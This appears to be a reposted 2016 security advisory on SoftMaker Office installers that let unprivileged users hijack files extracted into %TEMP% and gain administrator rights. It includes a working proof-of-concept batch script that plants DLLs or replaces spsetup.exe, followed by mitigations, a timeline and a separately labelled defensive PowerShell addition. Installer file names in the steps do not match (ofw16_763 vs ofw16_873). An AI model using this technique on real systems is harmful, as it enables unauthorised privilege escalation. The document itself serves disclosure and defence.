0day.today - Biggest Exploit Database in the World.
SoftMaker Office 201x Privilege Escalation Vulnerability

Hi @ll,

the service pack installers for SoftMaker Office 201x, available from
<http://www.softmaker.com/en/servicepacks-office-windows>, are (surprise.-)
vulnerable.

The executable installer (OUCH) ofw16_763.exe, a 7z SFX (OUCH), creates an
UNPROTECTED directory "%TEMP%\7zSxxxxxxxx\" to extract its payload, then
executes "%TEMP%\7zSxxxxxxxx\spsetup.exe".

"%TEMP%\7zSxxxxxxxx\" inherits the NTFS access rights of its parent "%TEMP%\",
i.e. allows full access for the UNPRIVILEGED user.

For this well-known vulnerability see
<https://cwe.mitre.org/data/definitions/377.html> and
<https://cwe.mitre.org/data/definitions/379.html>

Due to the embedded application manifest which specifies
"requireAdministrator" the executable installer can only be run with
administrative rights.

JFTR: if written properly, it would create a PROTECTED directory
"%TEMP%\7zSxxxxxxxx\", writable only for privileged users!

The UNPRIVILEGED user as well as any program running with the user's
credentials can modify the extracted files, for example
"%TEMP%\7zSxxxxxxxx\spsetup.exe", which is executed with administrative
rights, resulting in arbitrary code execution with elevation of privilege.

Additionally "spsetup.exe" is vulnerable to DLL hijacking, another
well-known vulnerability. See
<https://capec.mitre.org/data/definitions/471.html>,
<https://cwe.mitre.org/data/definitions/426.html>,
<https://cwe.mitre.org/data/definitions/427.html>,
<https://technet.microsoft.com/en-us/library/2269637.aspx>,
<https://msdn.microsoft.com/en-us/library/ff919712.aspx> and
<https://msdn.microsoft.com/en-us/library/ms682586.aspx> plus
<http://blogs.technet.com/b/srd/archive/2014/05/13/load-library-safely.aspx>

Thanks to the unprotected directory "%TEMP%\7zSxxxxxxxx\" the unprivileged
user can write DLLs to "%TEMP%\7zSxxxxxxxx\" which are loaded by
"spsetup.exe", again resulting in arbitrary code execution with elevation
of privilege!

Proof-of-concept:
~~~~~~~~~~~~~~~~~

0. download <http://www.softmaker.net/down/ofw16_763.exe> and save it in an
   arbitrary directory;

1. download <http://home.arcor.de/skanthak/download/SENTINEL.DLL>
   (see <http://home.arcor.de/skanthak/sentinel.html> alias
   <https://skanthak.homepage.t-online.de/sentinel.html>) and save it in
   an(other) arbitrary directory;

2. save the following batch script in the same directory as SENTINEL.DLL:

   --- OFW16_873.CMD ---
   :WAIT
   @If Not Exist "%TEMP%\7z*" Goto :WAIT
   For /D %%! In ("%TEMP%\7z*") Do Set foobar=%%!
   Copy "SENTINEL.DLL" "%foobar%\NTMARTA.DLL"
   Copy "SENTINEL.DLL" "%foobar%\VERSION.DLL"
   Copy "SENTINEL.DLL" "%foobar%\WINSPOOL.DRV"
   --- EOF ---

3. start the batch script;

4. execute ofw16_873.exe and notice the message boxes displayed by
   SENTINEL.DLL. PWNED!

5. download <http://home.arcor.de/skanthak/download/SENTINEL.EXE> to the
   same directory as the batch script;

6. in the batch script replace the 3 lines "Copy ..." with

   Copy "SENTINEL.EXE" "%foobar%\spsetup.exe"

7. start the batch script;

8. execute ofw16_873.exe and notice the message box displayed by
   SENTINEL.EXE. PWNED!

Mitigations:
~~~~~~~~~~~~

* Don't use executable installers! NEVER!
  Don't use self-extractors! NEVER!
  See <http://seclists.org/fulldisclosure/2015/Nov/101> and
  <http://seclists.org/fulldisclosure/2015/Dec/86> plus
  <http://home.arcor.de/skanthak/!execute.html> alias
  <https://skanthak.homepage.t-online.de/!execute.html> for more
  information.

* Practice STRICT privilege separation: NEVER use the so-called
  "protected" administrator account(s) created during Windows setup which
  use the same "%TEMP%" for unprivileged and privileged processes!

* Add an ACE "(D;OIIO;WP;;;WD)" to the ACL of every "%USERPROFILE%"; use
  <https://msdn.microsoft.com/en-us/library/aa374928.aspx> to decode it to
  "deny execution of files in this directory for everyone, inheritable to
  all files in all subdirectories".
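The advisory's point is that an elevated installer must not let its extraction directory inherit the unprivileged ACL of "%TEMP%". The following PowerShell is an added example, not code from Stefan Kanthak or from SoftMaker: the first function shows how an elevated installer (or a deployment script wrapping one) creates an extraction directory whose inheritance from "%TEMP%" is cut off and which grants FullControl only to SYSTEM and BUILTIN\Administrators; the second audits an existing directory, for example a "%TEMP%\7zS..." directory a running self-extractor has left behind, for Allow ACEs that give a low-privileged principal write access. Function names, parameters and the default list of "unprivileged" SIDs are this example's own choices; it assumes Windows with PowerShell 5.1 or later and an elevated session for the first function.

```powershell
# Added example (not part of the advisory or of the product): protect an
# extraction directory under %TEMP%, and audit a directory for write access
# granted to unprivileged principals (CWE-377 / CWE-379 pattern).
# Assumes Windows, PowerShell 5.1+, elevated session for New-ProtectedTempDirectory.

function New-ProtectedTempDirectory {
    param([string]$Prefix = 'sfx')   # hypothetical prefix, any name works

    $path = Join-Path $env:TEMP ($Prefix + [guid]::NewGuid().ToString('N'))
    $dir  = New-Item -ItemType Directory -Path $path -ErrorAction Stop

    $acl = Get-Acl -Path $dir.FullName
    # $true: stop inheriting ACEs from the parent (%TEMP%)
    # $false: do not keep copies of the ACEs inherited so far
    $acl.SetAccessRuleProtection($true, $false)

    $inherit = [System.Security.AccessControl.InheritanceFlags]'ContainerInherit, ObjectInherit'
    $prop    = [System.Security.AccessControl.PropagationFlags]::None
    $sids    = @(
        [System.Security.Principal.WellKnownSidType]::LocalSystemSid,
        [System.Security.Principal.WellKnownSidType]::BuiltinAdministratorsSid
    )
    foreach ($well in $sids) {
        $id   = [System.Security.Principal.SecurityIdentifier]::new($well, $null)
        $rule = New-Object -TypeName System.Security.AccessControl.FileSystemAccessRule `
                           -ArgumentList $id, 'FullControl', $inherit, $prop, 'Allow'
        $acl.AddAccessRule($rule)
    }
    Set-Acl -Path $dir.FullName -AclObject $acl
    return $dir.FullName
}

function Get-UnprivilegedWriteAce {
    param(
        [Parameter(Mandatory)][string]$Path,
        # Principals treated as unprivileged: Everyone, Authenticated Users,
        # BUILTIN\Users, and the calling user's own SID. A "protected
        # administrator" runs unelevated processes under that same SID, which
        # is why a %TEMP% shared by both token levels is the problem here.
        [string[]]$UnprivilegedSids = @(
            'S-1-1-0', 'S-1-5-11', 'S-1-5-32-545',
            [System.Security.Principal.WindowsIdentity]::GetCurrent().User.Value
        )
    )
    # Specific rights that let a principal change the directory's content
    $writeMask = [int]([System.Security.AccessControl.FileSystemRights](
        'WriteData, AppendData, WriteAttributes, WriteExtendedAttributes, ' +
        'Delete, DeleteSubdirectoriesAndFiles, ChangePermissions, TakeOwnership'))
    # GENERIC_WRITE (0x40000000) and GENERIC_ALL (0x10000000), which Get-Acl
    # reports as raw numbers on inherit-only ACEs
    $genericMask = 0x40000000 -bor 0x10000000

    $acl  = Get-Acl -Path $Path
    $hits = foreach ($ace in $acl.Access) {
        if ($ace.AccessControlType -ne 'Allow') { continue }
        $sid = $ace.IdentityReference.Translate(
                   [System.Security.Principal.SecurityIdentifier]).Value
        if ($UnprivilegedSids -notcontains $sid) { continue }
        $rights = [int]$ace.FileSystemRights
        if ((($rights -band $writeMask) -ne 0) -or (($rights -band $genericMask) -ne 0)) {
            [pscustomobject]@{
                Identity  = $ace.IdentityReference.Value
                Rights    = $ace.FileSystemRights
                Inherited = $ace.IsInherited
            }
        }
    }
    return $hits
}

# Usage (elevated):
#   $dir = New-ProtectedTempDirectory
#   Get-UnprivilegedWriteAce -Path $dir        # no output: only SYSTEM/Administrators
#   Get-UnprivilegedWriteAce -Path $env:TEMP   # the user's inheritable FullControl ACE
```

Running the audit against "%TEMP%" itself lists the user's own inheritable FullControl ACE, which is exactly what every directory a self-extractor creates there inherits unless it cuts inheritance the way the first function does. Running it against the directory returned by New-ProtectedTempDirectory returns nothing, because no ACE for an unprivileged principal survives SetAccessRuleProtection($true, $false).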
stay tuned
Stefan Kanthak

Timeline:
~~~~~~~~~

2016-12-15    sent vulnerability report to vendor
              no reply, not even an acknowledgement of receipt
2016-12-23    resent vulnerability report to vendor, cc CERT at german BSI
              no reply, not even an acknowledgement of receipt
2016-12-27    CERT at german BSI contacts vendor offering help
              no reply, not even an acknowledgement of receipt
2016-12-31    report published

# 0day.today [2024-11-14] #